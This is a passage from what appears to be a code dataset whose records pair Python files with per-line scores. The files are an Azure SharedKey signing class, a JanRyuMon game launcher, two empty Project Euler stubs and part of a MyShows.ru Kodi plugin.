Serializer.serialize_rfc(now)\n", "\n", " url = urlparse(request.url)\n", " uri_path = url.path\n", " uri_path = uri_path.replace('%5C', '/')\n", " uri_path = uri_path.replace('%2F', '/')\n", "\n", " # method to sign\n", " string_to_sign = request.method + '\\n'\n", "\n", " # get headers to sign\n", " request_header_dict = {\n", " key.lower(): val for key, val in request.headers.items() if val}\n", "\n", " request_headers = [\n", " str(request_header_dict.get(x, '')) for x in self.headers_to_sign]\n", "\n", " string_to_sign += '\\n'.join(request_headers) + '\\n'\n", "\n", " # get ocp- header to sign\n", " ocp_headers = []\n", " for name, value in request.headers.items():\n", " if 'ocp-' in name and value:\n", " ocp_headers.append((name.lower(), value))\n", "\n", " for name, value in sorted(ocp_headers):\n", " string_to_sign += \"{}:{}\\n\".format(name, value)\n", "\n", " # get account_name and uri path to sign\n", " string_to_sign += \"/{}{}\".format(self._account_name, uri_path)\n", "\n", " # get query string to sign if it is not table service\n", " query_to_sign = parse_qs(url.query)\n", "\n", " for name in sorted(query_to_sign.keys()):\n", " value = query_to_sign[name][0]\n", " if value:\n", " string_to_sign += \"\\n{}:{}\".format(name, value)\n", "\n", " # sign the request\n", " auth_string = \"SharedKey {}:{}\".format(\n", " self._account_name, self._sign_string(string_to_sign))\n", "\n", " request.headers[self._header] = auth_string\n", "\n", " return request\n", "\n", " def _sign_string(self, string_to_sign):\n", "\n", " _key = self._key.encode('utf-8')\n", " string_to_sign = string_to_sign.encode('utf-8')\n", "\n", " try:\n", " key = base64.b64decode(_key)\n", " except TypeError:\n", " raise ValueError(\"Invalid key value: {}\".format(self._key))\n", "\n", " signed_hmac_sha256 = hmac.HMAC(key, string_to_sign, hashlib.sha256)\n", " digest = signed_hmac_sha256.digest()\n", "\n", " return base64.b64encode(digest).decode('utf-8')\n", "\n", "\n", "class SharedKeyCredentials(Authentication):\n", "\n", " def __init__(self, account_name, key):\n", " super(SharedKeyCredentials, self).__init__()\n", " self.auth = SharedKeyAuth(self.header, account_name, key)\n", " \n", " def signed_session(self):\n", "\n", " session = super(SharedKeyCredentials, self).signed_session()\n", " session.auth = self.auth\n", "\n", " return session\n", " " ]
[ 0, 0.013333333333333334, 0, 0, 0, 0.013157894736842105, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03225806451612903, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0.5 ]
128
0.005928
false
# JRM Launcher - Launch JanRyuMon without the need of Internet Explorer and ActiveX # Copyright (C) Mino <mino@minomino.org> # This file is part of JRM Launcher. # JRM Launcher is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # JRM Launcher is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with JRM Launcher. If not, see <http://www.gnu.org/licenses/>. import os import os.path import sys import argparse import subprocess import jrm VERSION = "0.2.3" # Initializes and returns the command-line argument parser object. def init_parser(): parser = argparse.ArgumentParser(description= \ "Launch JRM without having to use IE and ActiveX. Read the README for detailed information.") parser.add_argument("-s", "--skip", action="store_true", \ help="If set, the PlayNC launcher is skipped altogether and launches JRM directly.") parser.add_argument("-alt", "--alternative", action="store_true", \ help="Alternative way of launching JRM. Only works with if skipping launcher.") parser.add_argument("-u", "--username", help="Your JRM username.") parser.add_argument("-p", "--password", help="Your JRM password.") parser.add_argument("-nc", "--ncpath", help="Path to the NCLoader folder.") parser.add_argument("-pnc", "--pncpath", help="Path to the PlayNC folder.") parser.add_argument("-jrm", "--jrmpath", help="Path to the JanRyuMon folder.") return parser # Set paths needed if searching for any of the folders automatically. def get_environ(): program_files = os.environ["ProgramFiles"] # Should point to the x86 folder on both 32-bit and 64-bit. user_profile = os.path.join(os.environ['HomeDrive'], os.environ['HomePath']) return (program_files, user_profile) # Attempts to find all the necessary files and folders and returns them. def get_paths(args): program_files, user_profile = get_environ() keygen_path = "" launcher_path = "" jrm_folder_path = "" # NCLoader if not args.ncpath: w7_appdata = user_profile + "\\AppData\\LocalLow\\" xp_appdata = user_profile + "\\Application Data\\" if os.path.exists(w7_appdata + "NCLoader\\NCKeygen.dll"): nc_folder = w7_appdata + "NCLoader" elif os.path.exists(xp_appdata + "NCLoader\\NCKeygen.dll"): nc_folder = xp_appdata + "NCLoader" else: print("ERROR: Could not locate the NCSoft key generator automatically.") input() exit(1) keygen_path = nc_folder + "\\NCKeygen.dll" else: keygen_path = args.ncpath + "\\NCKeygen.dll" if not args.skip: # PlayNC. Only if not skipped. if not args.pncpath: pncl_folder = "C:\\PlayNC\\PlayNCLauncher" if not os.path.exists(pncl_folder + "\\playnclauncher.exe"): print("ERROR: Could not locate the PlayNC launcher automatically.") input() exit(1) launcher_path = pncl_folder + "\\playnclauncher.exe" else: launcher_path = args.pncpath + "\\PlayNCLauncher\\playnclauncher.exe" if args.skip: # JRM. Only if skipped. if not args.jrmpath: if os.path.exists("{0}\\JanRyuMon\\JanRyuMon.exe".format(program_files)): jrm_folder = "{0}\\JanRyuMon".format(program_files) elif os.path.exists("{0}\\PlayNC\\JanRyuMon\\JanRyuMon.exe".format(user_profile)): jrm_folder = "{0}\\PlayNC\\JanRyuMon".format(user_profile) else: print("ERROR: Could not locate JanRyuMon automatically.") input() exit(1) jrm_folder_path = jrm_folder else: jrm_folder_path = args.jrmpath return (keygen_path, launcher_path, jrm_folder_path) # Prompt username and password if necessary, then return them. def get_login(args): if not args.username: username = input("Username: ") else: username = args.username if not args.password: password = input("Password: ") else: password = args.password return (username, password) # Initialize keygen and get unique ID. def get_ukey(keygen_path): keygen = jrm.NcKeygen(keygen_path) ukey = keygen.get_key() if not ukey: print("ERROR: Failed to get a unique key.") input() exit(1) return ukey # Initialize session object and get session ID. def get_session_id(username, password, ukey): session = jrm.JrmSession(ukey) if not session.login(username, password): print("ERROR: Failed to get a session ID. Incorrect username/password?") input() exit(1) return session.session_id def launch_jrm(jrm_folder_path, session_id, alternative=False): # Launch JRM directly. jrm_params = ('{0}\\JanRyuMon.exe'.format(jrm_folder_path), '/SessKey:"{0}"'.format(session_id), '/ChannelGroupIndex:"-1"', '/ServerAddr:"106.186.45.130"', '/StartGameID:"JanRyuMon"', '/RepositorySub:"localhost"', '/GamePath:"{0}"'.format(jrm_folder_path)) if alternative: return os.execv('{0}\\JanRyuMon.exe'.format(jrm_folder_path), jrm_params) else: return subprocess.Popen(" ".join(jrm_params), shell=False) def launch_launcher(launcher_path, session_id): # Launch the launcher. launcher_params = (launcher_path, '/GameID:"PlayNCLauncher"', '/ServiceFolder:"PlayNC"', '/SetupMng:"NCSetupMng"', '/LUpdateAddr:"uis.plaync.jp/UniUpdTool"', '/FileUpdateAddr:"http://uniupdate.plaync.jp/UniUpdTool/system"', '/StartGameID:"JanRyuMon"', '/SessKey:"{0}"'.format(session_id)) return subprocess.Popen(" ".join(launcher_params), shell=False) if __name__ == "__main__": print("JanRyuMon Launcher v{0}".format(VERSION)) print("by Mino - http://www.minomino.org\n") # Initialize command-line argument parser and parse if anything to parse. parser = init_parser() if len(sys.argv) > 1: args = parser.parse_args(sys.argv[1:]) else: args = parser.parse_args([]) # Get necessary paths. if not args.ncpath and not args.pncpath and not args.jrmpath: print("Trying to find paths automatically...") elif args.ncpath and args.pncpath and args.jrmpath: print("Using specified paths...") else: print("Using specified path(s). Trying to find the remaining...") keygen_path, launcher_path, jrm_folder_path = get_paths(args) # Get login info. if args.username and args.password: print("Using provided username and password.") username, password = get_login(args) # Get unique key print("Generating unique key...") ukey = get_ukey(keygen_path) # Get session ID print("Logging in as '{0}'...".format(username)) session_id = get_session_id(username, password, ukey) # Launch either launcher or JRM. if not args.skip: print("Starting the PlayNC launcher...") launch_launcher(launcher_path, session_id) else: print("Skipping the PlayNC launcher. Starting JanRyuMon...") if args.alternative: print("Launching with the alternative method...") launch_jrm(jrm_folder_path, session_id, args.alternative) else: launch_jrm(jrm_folder_path, session_id) print("\nGood luck, fellow lesbian.") input("Press enter to close this window.")
[ "# JRM Launcher - Launch JanRyuMon without the need of Internet Explorer and ActiveX\n", "# Copyright (C) Mino <mino@minomino.org>\n", "\n", "# This file is part of JRM Launcher.\n", "\n", "# JRM Launcher is free software: you can redistribute it and/or modify\n", "# it under the terms of the GNU General Public License as published by\n", "# the Free Software Foundation, either version 3 of the License, or\n", "# (at your option) any later version.\n", "\n", "# JRM Launcher is distributed in the hope that it will be useful,\n", "# but WITHOUT ANY WARRANTY; without even the implied warranty of\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n", "# GNU General Public License for more details.\n", "\n", "# You should have received a copy of the GNU General Public License\n", "# along with JRM Launcher. If not, see <http://www.gnu.org/licenses/>.\n", "\n", "\n", "import os\n", "import os.path\n", "import sys\n", "import argparse\n", "import subprocess\n", "import jrm\n", "\n", "VERSION = \"0.2.3\"\n", "\n", "# Initializes and returns the command-line argument parser object.\n", "def init_parser():\n", " parser = argparse.ArgumentParser(description= \\\n", " \"Launch JRM without having to use IE and ActiveX. Read the README for detailed information.\")\n", " parser.add_argument(\"-s\", \"--skip\", action=\"store_true\", \\\n", " help=\"If set, the PlayNC launcher is skipped altogether and launches JRM directly.\")\n", " parser.add_argument(\"-alt\", \"--alternative\", action=\"store_true\", \\\n", " help=\"Alternative way of launching JRM. Only works with if skipping launcher.\")\n", " parser.add_argument(\"-u\", \"--username\", help=\"Your JRM username.\")\n", " parser.add_argument(\"-p\", \"--password\", help=\"Your JRM password.\")\n", " parser.add_argument(\"-nc\", \"--ncpath\", help=\"Path to the NCLoader folder.\")\n", " parser.add_argument(\"-pnc\", \"--pncpath\", help=\"Path to the PlayNC folder.\")\n", " parser.add_argument(\"-jrm\", \"--jrmpath\", help=\"Path to the JanRyuMon folder.\")\n", " \n", " return parser\n", "\n", "# Set paths needed if searching for any of the folders automatically.\n", "def get_environ():\n", " program_files = os.environ[\"ProgramFiles\"] # Should point to the x86 folder on both 32-bit and 64-bit.\n", " user_profile = os.path.join(os.environ['HomeDrive'], os.environ['HomePath'])\n", " \n", " return (program_files, user_profile)\n", "\n", "# Attempts to find all the necessary files and folders and returns them.\n", "def get_paths(args):\n", " \n", " program_files, user_profile = get_environ()\n", " keygen_path = \"\"\n", " launcher_path = \"\"\n", " jrm_folder_path = \"\"\n", " \n", " # NCLoader\n", " if not args.ncpath:\n", " w7_appdata = user_profile + \"\\\\AppData\\\\LocalLow\\\\\"\n", " xp_appdata = user_profile + \"\\\\Application Data\\\\\"\n", " if os.path.exists(w7_appdata + \"NCLoader\\\\NCKeygen.dll\"):\n", " nc_folder = w7_appdata + \"NCLoader\"\n", " elif os.path.exists(xp_appdata + \"NCLoader\\\\NCKeygen.dll\"):\n", " nc_folder = xp_appdata + \"NCLoader\"\n", " else:\n", " print(\"ERROR: Could not locate the NCSoft key generator automatically.\")\n", " input()\n", " exit(1)\n", " keygen_path = nc_folder + \"\\\\NCKeygen.dll\"\n", " else:\n", " keygen_path = args.ncpath + \"\\\\NCKeygen.dll\"\n", " \n", " if not args.skip:\n", " # PlayNC. Only if not skipped.\n", " if not args.pncpath:\n", " pncl_folder = \"C:\\\\PlayNC\\\\PlayNCLauncher\"\n", " if not os.path.exists(pncl_folder + \"\\\\playnclauncher.exe\"):\n", " print(\"ERROR: Could not locate the PlayNC launcher automatically.\")\n", " input()\n", " exit(1)\n", " launcher_path = pncl_folder + \"\\\\playnclauncher.exe\"\n", " else:\n", " launcher_path = args.pncpath + \"\\\\PlayNCLauncher\\\\playnclauncher.exe\"\n", " \n", " if args.skip:\n", " # JRM. Only if skipped.\n", " if not args.jrmpath:\n", " if os.path.exists(\"{0}\\\\JanRyuMon\\\\JanRyuMon.exe\".format(program_files)):\n", " jrm_folder = \"{0}\\\\JanRyuMon\".format(program_files)\n", " elif os.path.exists(\"{0}\\\\PlayNC\\\\JanRyuMon\\\\JanRyuMon.exe\".format(user_profile)):\n", " jrm_folder = \"{0}\\\\PlayNC\\\\JanRyuMon\".format(user_profile)\n", " else:\n", " print(\"ERROR: Could not locate JanRyuMon automatically.\")\n", " input()\n", " exit(1)\n", " jrm_folder_path = jrm_folder\n", " else:\n", " jrm_folder_path = args.jrmpath\n", " \n", " return (keygen_path, launcher_path, jrm_folder_path)\n", "\n", "# Prompt username and password if necessary, then return them.\n", "def get_login(args):\n", " if not args.username:\n", " username = input(\"Username: \")\n", " else:\n", " username = args.username\n", " if not args.password:\n", " password = input(\"Password: \")\n", " else:\n", " password = args.password\n", " \n", " return (username, password)\n", "\n", "# Initialize keygen and get unique ID.\n", "def get_ukey(keygen_path):\n", " keygen = jrm.NcKeygen(keygen_path)\n", " ukey = keygen.get_key()\n", " if not ukey:\n", " print(\"ERROR: Failed to get a unique key.\")\n", " input()\n", " exit(1)\n", " \n", " return ukey\n", " \n", "# Initialize session object and get session ID.\n", "def get_session_id(username, password, ukey):\n", " session = jrm.JrmSession(ukey)\n", " if not session.login(username, password):\n", " print(\"ERROR: Failed to get a session ID. Incorrect username/password?\")\n", " input()\n", " exit(1)\n", " \n", " return session.session_id\n", "\n", "\n", " \n", "def launch_jrm(jrm_folder_path, session_id, alternative=False):\n", " # Launch JRM directly.\n", " jrm_params = ('{0}\\\\JanRyuMon.exe'.format(jrm_folder_path),\n", " '/SessKey:\"{0}\"'.format(session_id),\n", " '/ChannelGroupIndex:\"-1\"',\n", " '/ServerAddr:\"106.186.45.130\"',\n", " '/StartGameID:\"JanRyuMon\"',\n", " '/RepositorySub:\"localhost\"',\n", " '/GamePath:\"{0}\"'.format(jrm_folder_path))\n", " \n", " if alternative:\n", " return os.execv('{0}\\\\JanRyuMon.exe'.format(jrm_folder_path), jrm_params)\n", " else:\n", " return subprocess.Popen(\" \".join(jrm_params), shell=False)\n", " \n", "def launch_launcher(launcher_path, session_id):\n", " # Launch the launcher.\n", " launcher_params = (launcher_path,\n", " '/GameID:\"PlayNCLauncher\"',\n", " '/ServiceFolder:\"PlayNC\"',\n", " '/SetupMng:\"NCSetupMng\"',\n", " '/LUpdateAddr:\"uis.plaync.jp/UniUpdTool\"',\n", " '/FileUpdateAddr:\"http://uniupdate.plaync.jp/UniUpdTool/system\"',\n", " '/StartGameID:\"JanRyuMon\"',\n", " '/SessKey:\"{0}\"'.format(session_id))\n", " \n", " return subprocess.Popen(\" \".join(launcher_params), shell=False)\n", "\n", "if __name__ == \"__main__\":\n", " print(\"JanRyuMon Launcher v{0}\".format(VERSION))\n", " print(\"by Mino - http://www.minomino.org\\n\")\n", " \n", " # Initialize command-line argument parser and parse if anything to parse.\n", " parser = init_parser()\n", " if len(sys.argv) > 1:\n", " args = parser.parse_args(sys.argv[1:])\n", " else:\n", " args = parser.parse_args([])\n", " \n", " # Get necessary paths.\n", " if not args.ncpath and not args.pncpath and not args.jrmpath:\n", " print(\"Trying to find paths automatically...\")\n", " elif args.ncpath and args.pncpath and args.jrmpath:\n", " print(\"Using specified paths...\")\n", " else:\n", " print(\"Using specified path(s). Trying to find the remaining...\")\n", " keygen_path, launcher_path, jrm_folder_path = get_paths(args)\n", " \n", " # Get login info.\n", " if args.username and args.password:\n", " print(\"Using provided username and password.\")\n", " username, password = get_login(args)\n", " \n", " # Get unique key\n", " print(\"Generating unique key...\")\n", " ukey = get_ukey(keygen_path)\n", " \n", " # Get session ID\n", " print(\"Logging in as '{0}'...\".format(username))\n", " session_id = get_session_id(username, password, ukey)\n", " \n", " # Launch either launcher or JRM.\n", " if not args.skip:\n", " print(\"Starting the PlayNC launcher...\")\n", " launch_launcher(launcher_path, session_id)\n", " else:\n", " print(\"Skipping the PlayNC launcher. Starting JanRyuMon...\")\n", " if args.alternative:\n", " print(\"Launching with the alternative method...\")\n", " launch_jrm(jrm_folder_path, session_id, args.alternative)\n", " else:\n", " launch_jrm(jrm_folder_path, session_id)\n", " \n", " \n", " print(\"\\nGood luck, fellow lesbian.\")\n", " input(\"Press enter to close this window.\")\n", "\n", "\n", "\n", "\n", " " ]
[ 0.011904761904761904, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.05263157894736842, 0.038461538461538464, 0.018691588785046728, 0.015873015873015872, 0.009174311926605505, 0.013888888888888888, 0.009615384615384616, 0, 0, 0, 0, 0.012048192771084338, 0.2, 0, 0, 0, 0.05263157894736842, 0.018691588785046728, 0.012345679012345678, 0.2, 0, 0, 0, 0.047619047619047616, 0.2, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0.011904761904761904, 0, 0, 0, 0, 0.012195121951219513, 0.2, 0, 0, 0, 0.011627906976744186, 0, 0.010526315789473684, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0.047619047619047616, 0, 0, 0, 0, 0, 0, 0, 0, 0.1111111111111111, 0, 0, 0, 0.037037037037037035, 0, 0, 0, 0, 0, 0, 0.1111111111111111, 0, 0.2, 0, 0.021739130434782608, 0, 0, 0.012345679012345678, 0, 0, 0.1111111111111111, 0, 0, 0, 0.1111111111111111, 0.015625, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0.012195121951219513, 0, 0, 0.2, 0.020833333333333332, 0, 0, 0, 0, 0, 0, 0.011235955056179775, 0, 0, 0.2, 0, 0, 0.037037037037037035, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0.2, 0, 0, 0, 0.2, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0.2, 0.023809523809523808, 0, 0, 0, 0, 0, 0.75 ]
221
0.025364
false
# -*- coding: utf-8 -*- # ProjectEuler/src/python/problem201.py # # Subsets with a unique sum # ========================= # Published on Saturday, 5th July 2008, 02:00 pm # # For any set A of numbers, let sum(A) be the sum of the elements of A. # Consider the set B = {1,3,6,8,10,11}. There are 20 subsets of B containing # three elements, and their sums are: sum({1,3,6}) = 10, sum({1,3,8}) = 12, # sum({1,3,10}) = 14, sum({1,3,11}) = 15, sum({1,6,8}) = 15, sum({1,6,10}) = # 17, sum({1,6,11}) = 18, sum({1,8,10}) = 19, sum({1,8,11}) = 20, # sum({1,10,11}) = 22, sum({3,6,8}) = 17, sum({3,6,10}) = 19, sum({3,6,11}) # = 20, sum({3,8,10}) = 21, sum({3,8,11}) = 22, sum({3,10,11}) = 24, # sum({6,8,10}) = 24, sum({6,8,11}) = 25, sum({6,10,11}) = 27, # sum({8,10,11}) = 29. Some of these sums occur more than once, others are # unique. For a set A, let U(A,k) be the set of unique sums of k-element # subsets of A, in our example we find U(B,3) = {10,12,14,18,21,25,27,29} and # sum(U(B,3)) = 156. Now consider the 100-element set S = {12, 22, ... , 1002}. # S has 100891344545564193334812497256 50-element subsets. Determine the sum of # all integers which are the sum of exactly one of the 50-element subsets of S, # i.e. find sum(U(S,50)). import projecteuler as pe def main(): pass if __name__ == "__main__": main()
[ "# -*- coding: utf-8 -*-\n", "# ProjectEuler/src/python/problem201.py\n", "#\n", "# Subsets with a unique sum\n", "# =========================\n", "# Published on Saturday, 5th July 2008, 02:00 pm\n", "#\n", "# For any set A of numbers, let sum(A) be the sum of the elements of A.\n", "# Consider the set B = {1,3,6,8,10,11}. There are 20 subsets of B containing\n", "# three elements, and their sums are: sum({1,3,6}) = 10, sum({1,3,8}) = 12,\n", "# sum({1,3,10}) = 14, sum({1,3,11}) = 15, sum({1,6,8}) = 15, sum({1,6,10}) =\n", "# 17, sum({1,6,11}) = 18, sum({1,8,10}) = 19, sum({1,8,11}) = 20,\n", "# sum({1,10,11}) = 22, sum({3,6,8}) = 17, sum({3,6,10}) = 19, sum({3,6,11})\n", "# = 20, sum({3,8,10}) = 21, sum({3,8,11}) = 22, sum({3,10,11}) = 24,\n", "# sum({6,8,10}) = 24, sum({6,8,11}) = 25, sum({6,10,11}) = 27,\n", "# sum({8,10,11}) = 29. Some of these sums occur more than once, others are\n", "# unique. For a set A, let U(A,k) be the set of unique sums of k-element\n", "# subsets of A, in our example we find U(B,3) = {10,12,14,18,21,25,27,29} and\n", "# sum(U(B,3)) = 156. Now consider the 100-element set S = {12, 22, ... , 1002}.\n", "# S has 100891344545564193334812497256 50-element subsets. Determine the sum of\n", "# all integers which are the sum of exactly one of the 50-element subsets of S,\n", "# i.e. find sum(U(S,50)).\n", "\n", "import projecteuler as pe\n", "\n", "def main():\n", " pass\n", "\n", "if __name__ == \"__main__\":\n", " main()\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08333333333333333, 0, 0, 0.037037037037037035, 0 ]
30
0.004012
false
# -*- coding: utf-8 -*- # ProjectEuler/src/python/problem295.py # # Lenticular holes # ================ # Published on Saturday, 5th June 2010, 01:00 pm # # We call the convex area enclosed by two circles a lenticular hole if: The # centres of both circles are on lattice points. The two circles intersect at # two distinct lattice points. The interior of the convex area enclosed by both # circles does not contain any lattice points. Consider the circles: C0: # x2+y2=25 C1: (x+4)2+(y-4)2=1 C2: (x-12)2+(y-4)2=65 The circles C0, C1 # and C2 are drawn in the picture below. C0 and C1 form a lenticular hole, # as well as C0 and C2. We call an ordered pair of positive real numbers (r1, # r2) a lenticular pair if there exist two circles with radii r1 and r2 that # form a lenticular hole. We can verify that (1, 5) and (5, 65) are the # lenticular pairs of the example above. Let L(N) be the number of distinct # lenticular pairs (r1, r2) for which 0 r1 r2 N. We can verify that L(10) = # 30 and L(100) = 3442. Find L(100 000). import projecteuler as pe def main(): pass if __name__ == "__main__": main()
[ "# -*- coding: utf-8 -*-\n", "# ProjectEuler/src/python/problem295.py\n", "#\n", "# Lenticular holes\n", "# ================\n", "# Published on Saturday, 5th June 2010, 01:00 pm\n", "#\n", "# We call the convex area enclosed by two circles a lenticular hole if: The\n", "# centres of both circles are on lattice points. The two circles intersect at\n", "# two distinct lattice points. The interior of the convex area enclosed by both\n", "# circles does not contain any lattice points. Consider the circles: C0:\n", "# x2+y2=25 C1: (x+4)2+(y-4)2=1 C2: (x-12)2+(y-4)2=65 The circles C0, C1\n", "# and C2 are drawn in the picture below. C0 and C1 form a lenticular hole,\n", "# as well as C0 and C2. We call an ordered pair of positive real numbers (r1,\n", "# r2) a lenticular pair if there exist two circles with radii r1 and r2 that\n", "# form a lenticular hole. We can verify that (1, 5) and (5, 65) are the\n", "# lenticular pairs of the example above. Let L(N) be the number of distinct\n", "# lenticular pairs (r1, r2) for which 0 r1 r2 N. We can verify that L(10) =\n", "# 30 and L(100) = 3442. Find L(100 000).\n", "\n", "import projecteuler as pe\n", "\n", "def main():\n", " pass\n", "\n", "if __name__ == \"__main__\":\n", " main()\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08333333333333333, 0, 0, 0.037037037037037035, 0 ]
27
0.004458
false
# -*- coding: utf-8 -*- import urllib, re, sys, socket, json, os import xbmcplugin, xbmcgui, xbmc, xbmcaddon, xbmcvfs from functions import * from torrents import * from app import Handler, Link from rating import * __version__ = "1.8.9" __plugin__ = "MyShows.ru " + __version__ __author__ = "DiMartino" __settings__ = xbmcaddon.Addon(id='plugin.video.myshows') __language__ = __settings__.getLocalizedString login=__settings__.getSetting("username") ruName=__settings__.getSetting("ruName") change_onclick=__settings__.getSetting("change_onclick") cookie_auth=__settings__.getSetting("cookie_auth") useTVDB=getSettingAsBool('tvdb') socket.setdefaulttimeout(30) __addonpath__= __settings__.getAddonInfo('path') icon = __addonpath__+'/icon.png' __tmppath__= os.path.join(__addonpath__, 'tmp') forced_refresh_data=__settings__.getSetting("forced_refresh_data") refresh_period=int('1|4|12|24'.split('|')[int(__settings__.getSetting("refresh_period"))]) refresh_always=__settings__.getSetting("refresh_always") striplist=['the', 'tonight', 'show', 'with', '(2005)', '(2009)', '(2012)', ' ', ' ', ' ', ' ', ' ', ' ', ' '] Debug('[SYS ARGV]: '+str(urllib.unquote_plus(sys.argv[2]))[1:]) check_login = re.search('='+login+';', cookie_auth) if not check_login: cookie_auth=auth() class Main(Handler): def __init__(self): self.menu=[] menu_style=__settings__.getSetting("menu_style") top=ontop() if top: self.menu.append(top) if menu_style=='1': self.menu.extend([{"title":__language__(30111),"mode":"41"},{"title":__language__(30100),"mode":"10"}, {"title":__language__(30102),"mode":"17"},{"title":__language__(30150),"mode":"18"}, {"title":__language__(30103),"mode":"14"},{"title":__language__(30104),"mode":"15"}, {"title":__language__(30105),"mode":"16"},{"title":__language__(30106),"mode":"27"}, {"title":__language__(30107),"mode":"28"}, {"title":__language__(30108),"mode":"100"}, {"title":__language__(30112),"mode":"40"}, {"title":__language__(30101),"mode":"19"}, {"title":__language__(30149),"mode":"62"},]) else: self.menu.extend([{"title":__language__(30111),"mode":"41"},{"title":__language__(30139),"mode":"13"}, {"title":__language__(30106),"mode":"27"}, {"title":__language__(30107),"mode":"28"}, {"title":__language__(30108),"mode":"100"}, {"title":__language__(30112),"mode":"40"}, {"title":__language__(30136),"mode":"50"}, {"title":__language__(30137),"mode":"60"}, {"title":__language__(30101),"mode":"19"}, {"title":__language__(30146),"mode":"61"}, {"title":__language__(30141),"mode":"510"}]) if __settings__.getSetting("debug")=='true': self.menu.append({"title":"TEST","mode":"999"}) self.handle() if __settings__.getSetting("autoscan")=='true': auto_scan() friend_xbmc() def handle(self): for self.i in self.menu: try: argv=self.i['argv'] except: argv={'content': 'videos'} self.item(Link(self.i['mode'], argv), title=unicode(self.i['title'])) class ExtraFunction(Main): def __init__(self): self.menu=[] self.menu.extend([{"title":__language__(30136),"mode":"50"}, {"title":__language__(30137),"mode":"60"}, {"title":__language__(30146),"mode":"61"}, {"title":__language__(30141),"mode":"510"}, ]) self.handle() def Shows(): try: syncshows=SyncXBMC() except: syncshows=False saveCheckPoint() xbmcplugin.setContent(int(sys.argv[1]), 'tvshows') #lockView('info') if mode==19: KB = xbmc.Keyboard() if action: KB.setDefault(unicode(action)) KB.setHeading(__language__(30203)) KB.doModal() if (KB.isConfirmed()) and KB.getText() not in [None,'']: data= Data(cookie_auth, 'http://api.myshows.ru/shows/search/?q='+urllib.quote_plus(KB.getText())) else: return else: data=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/') jload=data.get() if jload: jdata = json.loads(jload) else: return #if mode in(11,12): # next_data=json.loads(Data(cookie_auth, 'http://api.myshows.ru/profile/episodes/next/').get()) #else: # next_data=[] if mode==13: menu=[{"title":TextBB(__language__(30100), 'b'),"mode":"10", "argv":{}}, {"title":TextBB(__language__(30102), 'b'),"mode":"17", "argv":{}}, {"title":TextBB(__language__(30150), 'b'),"mode":"18", "argv":{}}, {"title":TextBB(__language__(30103), 'b'),"mode":"14", "argv":{}}, {"title":TextBB(__language__(30104), 'b'),"mode":"15", "argv":{}}, {"title":TextBB(__language__(30105), 'b'),"mode":"16", "argv":{}},] #{"title":TextBB('ONGOING', 'b'),"mode":"11", "argv":{}}, #{"title":TextBB('FULLSEASON', 'b'),"mode":"12", "argv":{}},] for i in menu: link=Link(i['mode'], i['argv']) h=Handler(int(sys.argv[1]), link) h.item(link, title=unicode(i['title'])) for showId in jdata: if ruName=='true' and jdata[showId]['ruTitle']: title=jdata[showId]['ruTitle'].encode('utf-8') else: title=jdata[showId]['title'] if mode not in (10,11,12,19): if mode!=18 and jdata[showId]['watchStatus']=="watching" and jdata[showId]['totalEpisodes']-jdata[showId]['watchedEpisodes']==0: continue elif mode not in (13,17) and jdata[showId]['watchStatus']=="watching" and jdata[showId]['totalEpisodes']-jdata[showId]['watchedEpisodes']!=0: continue elif mode!=14 and jdata[showId]['watchStatus']=="later": continue elif mode!=15 and jdata[showId]['watchStatus']=="finished": continue elif mode!=16 and jdata[showId]['watchStatus']=="cancelled": continue if mode==19: rating=int(jdata[showId]['watching']) else: rating=float(jdata[showId]['rating']) pre=prefix(showId=int(showId)) item = xbmcgui.ListItem(pre+title, iconImage='DefaultFolder.png', thumbnailImage=str(jdata[showId]['image'])) info={'title': title, 'label':title, 'tvshowtitle': jdata[showId]['title'], 'rating': rating*2, 'votes':1, 'year': '', } #'playcount':jdata[showId]['watchedEpisodes'], 'episode':jdata[showId]['totalEpisodes'] НЕ ХОЧУ ГАЛКИ try: info['plot']=__language__(30265) % (str(jdata[showId]['watchedEpisodes']), str(jdata[showId]['totalEpisodes']))+'\r\n'+__language__(30266)+' '+str(rating)+'\r\n' except:info['plot']='' if syncshows: item=syncshows.shows(jdata[showId]['title'], item, info) else: item.setInfo( type='Video', infoLabels=info) stringdata={"showId":int(showId), "seasonId":None, "episodeId":None, "id":None} refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/') sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+refresh_url+'&showId=' + 